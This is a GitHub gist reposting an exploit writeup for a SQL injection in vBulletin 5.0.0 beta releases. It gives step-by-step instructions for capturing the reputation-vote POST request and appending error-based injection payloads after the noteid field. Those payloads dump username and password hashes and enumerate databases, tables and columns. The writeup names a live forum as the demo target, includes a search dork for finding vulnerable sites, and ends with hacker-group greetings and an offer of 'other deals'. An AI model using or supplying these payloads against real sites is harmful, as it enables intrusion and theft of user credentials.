Created
December 3, 2013 11:33
-
-
Save nikcub/7767735 to your computer and use it in GitHub Desktop.
vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day | |
#Category: web application | |
#Type: SQL Injection | |
#Requirements: Firefox/Live HTTP Headers/ | |
#Dork: Powered by vBulletin™ Version 5.0.0 Beta (or) Use ur Brain you'll get more o_O | |
Step 1 | |
Create an Account on vBulletin forum Verify the account and Activate it | |
For Demo we will use this Forum | |
Link = http://www.prospectrush.com/new_forum/ | |
I have alredy made an account so i wil direct login | |
Step 2 | |
go to/Open any topic and open Live HTTP Headers (https://addons.mozilla.org/en/firefox/addon/live-http-headers/) << download from here | |
and then on the Topic page search for "Like" button and Clik on it .... | |
then the Http responce would be caught on HTTP HEaders addon | |
Step 3 | |
Go to the first POST in HTTP Headers ,it will look like this | |
POST *Something /ajax/api/reputation/vote HTTP/1.1 | |
select it and click on Replay button | |
Step 4 | |
Then go on Send POST Content and use below Query , | |
just add the Below Query after "noteid=somenumber" | |
======================= | |
SQL Query | |
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 | |
======================= | |
The Above SQLi command will fetch out the first record from user table(username/password) | |
see the username and pass in encrypted get the salt to and decrypt it i wont show decrypting use your brain :) | |
============= | |
Greets to Real Author , All Indian & Pakistani Brothers , 1337day , ashiyane forums & All Indian Hacking Groups | |
//Note : Those Brothers who have my mail id can Contact me for other Deals | |
Offer Valid till 29th March 2013 | |
Regards | |
./NoTty_rAJ | |
Thanks | |
[#Other SQLi Syntaxes] | |
********************************************************************************************************************* | |
|Version(): | |
********************************************************************************************************************* | |
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
|User(): | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
|Database(): | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
|Database Print: | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
|Table Count: | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
|Print Tables: | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
|Columns of selected table: | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
|Fetch Out Data: | |
********************************************************************************************************************* | |
********************************************************************************************************************* | |
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 | |
********************************************************************************************************************* |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment